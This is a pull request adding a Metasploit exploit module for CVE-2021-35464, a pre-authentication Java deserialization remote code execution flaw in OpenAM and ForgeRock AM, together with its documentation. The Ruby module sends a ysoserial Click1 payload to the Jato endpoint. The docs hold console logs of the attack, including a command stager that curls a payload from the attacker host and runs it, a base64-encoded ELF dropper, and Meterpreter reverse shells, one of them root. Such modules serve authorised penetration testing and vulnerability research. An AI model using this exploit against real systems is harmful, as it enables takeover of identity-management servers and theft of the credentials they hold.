### PR TITLE
Add module for CVE-2021-35464; pre-auth RCE in ForgeRock AM (and OpenAM) server

### DIFF
--- a/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
+++ b/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
@@ -9,20 +9,42 @@ exploitation yields code execution on the target system.
 
 This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
 is susceptible to the same issue.
-### Installation
 
+### Installation
 
 #### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
 
+*This maps TCP port 7080 to the containers port 8080.*
+
 1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam`
 1. Navigate to http://<ip_address>:7080/openam
-1. Follow manual configuration steps. Automatic configuration appears to fail.
+1. Follow the manual configuration steps. Automatic configuration appears to fail.
 1. Except where otherwise noted, use the default configuration values and set password fields where required.
     1. In Step 3, set the ports to the following values
         * DIRECTORY_ADMIN_PORT = 4444
         * DIRECTORY_JMX_PORT = 1689
         * DIRECTORY_PORT = 389
     1. In Step 4, select "OpenAM User Data Store"
+
+#### ForgeRock with Docker
+
+*This assumes that the ForgeRock `AM-6.5.3.war` file is available for deployment.*
+
+1. Rename or copy `AM-6.5.3.war` to `openam.war`
+1. In the same directory as the `openam.war` file, create a `Dockerfile` with the following contents:
+
+    ```
+    FROM tomcat:8.5.3-jre8
+    
+    MAINTAINER metasploit
+    
+    COPY openam.war /usr/local/tomcat/webapps/
+    ```
+
+1. Build the docker image using `docker build . -t forgerock`
+1. Run the container using `docker container run -it --publish 8080:8080 forgerock`
+1. Navigate to http://<ip_address>:8080/openam
+1. Follow the default configuration steps.
 
 ## Verification Steps
 
@@ -100,5 +122,4 @@ Meterpreter  : x64/linux
 meterpreter > getuid
 Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
 meterpreter > 
-
 ```

--- a/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
+++ b/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
@@ -1,0 +1,102 @@
+## Vulnerable Application
+
+### Description
+
+This module leverages a pre-authentication remote code execution vulnerability
+in ForgeRock’s AM identity and access management solution. The vulnerability
+arises from a Java deserialization flaw in AM’s implementation of the JATO
+framework and can be triggered by a simple one-line GET or POST request to a
+vulnerable endpoint. Successful exploitation yields code execution on the
+target system.
+
+### Installation
+
+
+#### Ubuntu 20.04.2x64 with Docker version 20.10.2
+```
+sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam
+Navigate to http://<ip_address>:7080/opanam
+Follow manual configuration steps.  Automatic appears to fail
+Default values are good for everything except ports.  Use the following values:
+DIRECTORY_ADMIN_PORT = 4444
+DIRECTORY_JMX_PORT = 1689
+DIRECTORY_PORT = 50389
+```
+
+## Verification Steps
+1. OpenAM
+1. Perform manual configuration of OpenAM
+1. Do: `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`
+1. Do: `set RHOST <ip>`
+1. Do: `set LHOST <ip>`
+1. Do: `set LPORT <port>`
+1. Do: `run`
+1. You should get a Meterpreter session.
+
+## Scenarios
+
+#### Ubuntu 20.04.2x64 with Docker version 20.10.2
+```
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options
+
+Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.134.134  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      7080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
+                                         hine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
+   LPORT  8443             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > run
+
+[*] Started reverse TCP handler on 192.168.135.197:8443 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://0.0.0.0:8080/Zrrhm8JKIL8QB2Q
+[*] Local IP: http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q
+[*] Generated command stager: ["curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP"]
+[+] Successfully executed command: curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP
+[*] Client 192.168.134.134 (curl/7.64.0) requested /Zrrhm8JKIL8QB2Q
+[*] Sending payload to 192.168.134.134 (curl/7.64.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012548 bytes) to 192.168.134.134
+[*] Command Stager progress - 100.00% done (123/123 bytes)
+[*] Meterpreter session 11 opened (192.168.135.197:8443 -> 192.168.134.134:44944) at 2021-07-02 15:59:30 -0500
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 10.9 (Linux 5.8.0-53-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
+meterpreter > 
+
+```

--- a/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
+++ b/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
@@ -2,28 +2,30 @@
 
 ### Description
 
-This module leverages a pre-authentication remote code execution vulnerability
-in ForgeRock’s AM identity and access management solution. The vulnerability
-arises from a Java deserialization flaw in AM’s implementation of the JATO
-framework and can be triggered by a simple one-line GET or POST request to a
-vulnerable endpoint. Successful exploitation yields code execution on the
-target system.
+This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access
+management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato
+framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful
+exploitation yields code execution on the target system.
 
+This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
+is susceptible to the same issue.
 ### Installation
 
 
 #### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
-```
-sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam
-Navigate to http://<ip_address>:7080/openam
-Follow manual configuration steps.  Automatic appears to fail
-Default values are good for everything except ports.  Use the following values:
-DIRECTORY_ADMIN_PORT = 4444
-DIRECTORY_JMX_PORT = 1689
-DIRECTORY_PORT = 50389
-```
+
+1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam`
+1. Navigate to http://<ip_address>:7080/openam
+1. Follow manual configuration steps. Automatic configuration appears to fail.
+1. Except where otherwise noted, use the default configuration values and set password fields where required.
+    1. In Step 3, set the ports to the following values
+        * DIRECTORY_ADMIN_PORT = 4444
+        * DIRECTORY_JMX_PORT = 1689
+        * DIRECTORY_PORT = 389
+    1. In Step 4, select "OpenAM User Data Store"
 
 ## Verification Steps
+
 1. OpenAM
 1. Perform manual configuration of OpenAM
 1. Do: `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`

--- a/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
+++ b/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
@@ -12,10 +12,10 @@ target system.
 ### Installation
 
 
-#### Ubuntu 20.04.2x64 with Docker version 20.10.2
+#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
 ```
 sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam
-Navigate to http://<ip_address>:7080/opanam
+Navigate to http://<ip_address>:7080/openam
 Follow manual configuration steps.  Automatic appears to fail
 Default values are good for everything except ports.  Use the following values:
 DIRECTORY_ADMIN_PORT = 4444
@@ -35,7 +35,7 @@ DIRECTORY_PORT = 50389
 
 ## Scenarios
 
-#### Ubuntu 20.04.2x64 with Docker version 20.10.2
+#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
 ```
 msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options
 

--- a/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
+++ b/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
@@ -13,11 +13,11 @@ is susceptible to the same issue.
 
 ### Installation
 
-#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
+#### OpenAM 14.6.3 on Ubuntu 20.04.2 x64 with Docker version 20.10.7
 
 *This maps TCP port 7080 to the containers port 8080.*
 
-1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam:14.6.2`
+1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam:14.6.3`
 1. Navigate to http://<ip_address>:7080/openam
 1. Click `Create New Configuration`, not `Create Default Configuration`, as automatic configuration appears to fail.
 1. Except where otherwise noted, use the default configuration values and set password fields where required.
@@ -36,9 +36,9 @@ is susceptible to the same issue.
 
     ```
     FROM tomcat:8.5.3-jre8
-    
+
     MAINTAINER metasploit
-    
+
     COPY openam.war /usr/local/tomcat/webapps/
     ```
 
@@ -60,8 +60,16 @@ is susceptible to the same issue.
 
 ## Scenarios
 
-#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
+#### OpenAM 14.6.3 on Ubuntu 20.04.2 x64 with Docker version 20.10.7
 ```
+msf6 > use exploit/multi/http/cve_2021_35464_forgerock_openam
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set LHOST docker0
+LHOST => 172.18.0.1
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RPORT 7080
+RPORT => 7080
 msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options
 
 Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):
@@ -69,14 +77,14 @@ Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     192.168.134.134  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT      7080             yes       The target port (TCP)
-   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
-                                         hine or 0.0.0.0 to listen on all addresses.
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
+                                         machine or 0.0.0.0 to listen on all addresses.
    SRVPORT    8080             yes       The local port to listen on.
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /                yes       Base path
+   TARGETURI  /openam          yes       Base path
    URIPATH                     no        The URI to use for this exploit (default is random)
    VHOST                       no        HTTP server virtual host
 
@@ -85,8 +93,8 @@ Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
-   LPORT  8443             yes       The listen port
+   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -96,31 +104,99 @@ Exploit target:
    1   Linux Dropper
 
 
-msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > run
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > check
+[*] 127.0.0.1:7080 - The target appears to be vulnerable.
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > exploit
 
-[*] Started reverse TCP handler on 192.168.135.197:8443 
+[*] Started reverse TCP handler on 172.18.0.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
-[*] Using URL: http://0.0.0.0:8080/Zrrhm8JKIL8QB2Q
-[*] Local IP: http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q
-[*] Generated command stager: ["curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP"]
-[+] Successfully executed command: curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP
-[*] Client 192.168.134.134 (curl/7.64.0) requested /Zrrhm8JKIL8QB2Q
-[*] Sending payload to 192.168.134.134 (curl/7.64.0)
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3012548 bytes) to 192.168.134.134
-[*] Command Stager progress - 100.00% done (123/123 bytes)
-[*] Meterpreter session 11 opened (192.168.135.197:8443 -> 192.168.134.134:44944) at 2021-07-02 15:59:30 -0500
-[*] Server stopped.
+[+] Successfully executed command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwSAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/YmhYe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/wucGF' < '/tmp/YmhYe.b64' ; chmod +x '/tmp/wucGF' ; '/tmp/wucGF' ; rm -f '/tmp/wucGF' ; rm -f '/tmp/YmhYe.b64'
+[*] Sending stage (3012548 bytes) to 172.18.0.2
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:52990) at 2021-07-09 16:15:05 -0500
 
+meterpreter > getuid
+Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
+meterpreter > shell
+Process 490 created.
+Channel 1 created.
+pwd
+/usr/local/tomcat
+^Z
+Background channel 1? [y/N]  y
 meterpreter > sysinfo
-Computer     : 172.17.0.2
-OS           : Debian 10.9 (Linux 5.8.0-53-generic)
+Computer     : 172.18.0.2
+OS           : Debian 10.9 (Linux 5.8.0-59-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter >
+```
+
+### ForgeRock AM 6.5.3 on Ubuntu 20.04.2 x64 with Docker version 20.10.7
+```
+msf6 > use exploit/multi/http/cve_2021_35464_forgerock_openam
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set LHOST docker0
+LHOST => 172.18.0.1
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RPORT 8080
+RPORT => 7080
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options
+
+Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
+                                         machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /openam          yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > exploit
+
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[+] Successfully executed command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwSAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/rxeJM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/drsZI' < '/tmp/rxeJM.b64' ; chmod +x '/tmp/drsZI' ; '/tmp/drsZI' ; rm -f '/tmp/drsZI' ; rm -f '/tmp/rxeJM.b64'
+[*] Sending stage (3012548 bytes) to 172.18.0.2
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:53510) at 2021-07-09 16:37:32 -0500
+
 meterpreter > getuid
-Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
-meterpreter > 
+Server username: root @ 731c8d4b9b26 (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.18.0.2
+OS           : Debian 8.5 (Linux 5.8.0-59-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
+++ b/documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
@@ -1,11 +1,12 @@
 ## Vulnerable Application
+OpenAM versions 7 and later are not affected. A patch is available that can be applied for OpenAM version 6.
 
 ### Description
 
 This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access
 management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato
 framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful
-exploitation yields code execution on the target system.
+exploitation yields code execution on the target system as the service user.
 
 This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
 is susceptible to the same issue.
@@ -16,14 +17,14 @@ is susceptible to the same issue.
 
 *This maps TCP port 7080 to the containers port 8080.*
 
-1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam`
+1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam:14.6.2`
 1. Navigate to http://<ip_address>:7080/openam
-1. Follow the manual configuration steps. Automatic configuration appears to fail.
+1. Click `Create New Configuration`, not `Create Default Configuration`, as automatic configuration appears to fail.
 1. Except where otherwise noted, use the default configuration values and set password fields where required.
     1. In Step 3, set the ports to the following values
         * DIRECTORY_ADMIN_PORT = 4444
         * DIRECTORY_JMX_PORT = 1689
-        * DIRECTORY_PORT = 389
+        * DIRECTORY_PORT = 50389
     1. In Step 4, select "OpenAM User Data Store"
 
 #### ForgeRock with Docker
@@ -48,9 +49,9 @@ is susceptible to the same issue.
 
 ## Verification Steps
 
-1. OpenAM
-1. Perform manual configuration of OpenAM
-1. Do: `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`
+1. Follow the OpenAM instructions listed above to install OpenAM
+1. Follow the `ForgeRock with Docker` instructions above to install ForgeRock.
+1. Do: `use exploit/multi/http/cve_2021_35464_forgerock_openam`
 1. Do: `set RHOST <ip>`
 1. Do: `set LHOST <ip>`
 1. Do: `set LPORT <port>`

--- a/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
+++ b/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::JavaDeserialization
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => '',
+          'Description' => %q{
+          },
+          'Author' => [
+            'Michael Stepankin', # Original Discovery
+            'bwatters-r7',        # Msf module
+            'Spencer McIntyre',   # All of the Help
+            'jheysel-r7'          # Check Method
+          ],
+          'References' => [
+            ['CVE', '2021-35464'],
+            ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],
+            ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']
+          ],
+          'DisclosureDate' => '2021-06-29',
+          'License' => MSF_LICENSE,
+          'Platform' => ['unix', 'linux'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Privileged' => false,
+          'Targets' => [
+            [
+              'Unix Command',
+              {
+                'Platform' => 'unix',
+                'Arch' => ARCH_CMD,
+                'Type' => :unix_cmd,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+                }
+              }
+            ],
+            [
+              'Linux Dropper',
+              {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :linux_dropper,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+          'DefaultTarget' => 1,
+          'DefaultOptions' => {
+            'SSL' => false
+          },
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+          }
+        )
+    )
+    register_options([
+      Opt::RPORT(7080),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
+      'vars_get' => {
+        'jato.pageSession' => Base64.urlsafe_encode64(Rex::Text.rand_text_alphanumeric(6..13))
+      }
+    )
+    if res && res.code == 302 && res.headers['LOCATION'].include?('base/AMInvalidURL')
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
+    ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
+      'vars_get' => {
+        'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)
+      }
+    )
+    unless res && res.code == 302
+      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
+    end
+    print_good("Successfully executed command: #{cmd}")
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
+++ b/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
       }
     )
-    if res.nil? || res.empty?
+    if res.nil? || res.body.empty?
       CheckCode::Unknown("The target server didn't respond!")
     elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
       CheckCode::Appears

--- a/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
+++ b/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  include Msf::Exploit::JavaDeserialization
 
   def initialize(info = {})
     super(
@@ -85,7 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
       }
     )
-    if res && res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
+    if res.nil? || res.empty?
+      CheckCode::Unknown("The target server didn't respond!")
+    elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
       CheckCode::Appears
     else
       CheckCode::Safe

--- a/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
+++ b/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
             This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and
             access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s
             implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a
-            vulnerable endpoint. Successful exploitation yields code execution on the target system.
+            vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.
 
             This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
             is susceptible to the same issue.
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
       }
     )
-    if res.nil? || res.body.empty?
+    if res.nil?
       CheckCode::Unknown("The target server didn't respond!")
     elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
       CheckCode::Appears

--- a/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
+++ b/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
@@ -73,14 +73,14 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options([
       Opt::RPORT(8080),
-      OptString.new('TARGETURI', [true, 'Base path', '/'])
+      OptString.new('TARGETURI', [true, 'Base path', '/openam'])
     ])
   end
 
   def check
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
+      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
       'vars_post' => {
         'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
       }
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
     res = send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
+      'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
       'vars_post' => {
         'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)
       }

--- a/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
+++ b/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
@@ -13,11 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
         update_info(
           info,
-          'Name' => '',
+          'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',
           'Description' => %q{
+            This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and
+            access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s
+            implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a
+            vulnerable endpoint. Successful exploitation yields code execution on the target system.
+
+            This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
+            is susceptible to the same issue.
           },
